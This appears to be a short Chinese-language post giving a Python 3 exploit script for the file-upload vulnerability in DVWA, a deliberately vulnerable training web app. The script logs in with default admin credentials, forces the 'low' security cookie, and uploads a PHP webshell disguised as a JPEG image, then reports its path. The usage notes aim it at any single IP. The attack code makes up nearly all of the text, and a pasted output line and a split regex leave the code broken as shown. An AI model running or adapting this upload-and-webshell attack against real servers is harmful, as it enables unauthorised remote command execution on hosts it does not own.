dvwa上传漏洞利用exp

用法(python3)

针对单个ip
d盘放个小马(D:\cmd.php)

url案例
http://xx.xx.xx.xx:9090

exp

import requests
import re

url = input("请输入[http://127.0.0.1:8080]:"+'\n')
headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0',
         'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
         'Accept-Lanuage':'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
         'Connection':'keep-alive',
         'Upgrade-Insecure-Requests':'1',}

index_url = url+'/login.php'
index_response = requests.get(url=index_url, headers=headers, timeout=5)
user_token = re.findall(r"name='user_token' value='(.*?)'", index_response.text)[0]
post_data = {
    'username': 'admin',
    'password': 'password',
    'Login': 'Login',
    'user_token': user_token,
}

#python 修改cookies
cookie = index_response.cookies
cookies_dict = requests.utils.dict_from_cookiejar(cookie)
cookies_dict['security'] = 'low'
cookies = cookies_dict

respones = requests.post(url=index_url, headers=headers, data=post_data, timeout=5, cookies=cookies)
upload_url = url+'/vulnerabilities/upload/'
upload_response = requests.get(url=upload_url, headers=headers, timeout=5, cookies=cookies)

files={ 'MAX_FILE_SIZE':(None,'100000'),
        'uploaded':('cmd.php', open(r'D:\cmd.php', 'rb'), 'image/jpeg'),
        'Upload':(None,'Upload'),
        'user_token': (None, user_token)
        }

r=requests.post(upload_url,files=files,headers=headers, cookies=cookies)
#print(r.text)
#
../../hackable/uploads/cmd.php succesfully uploaded!

if 'cmd.php' in r.text:
    res = re.findall(r'
(.*?)
', r.text)
    print("上传成功路径为：", res)
    print("-"*100)
else:
    print("连接错误")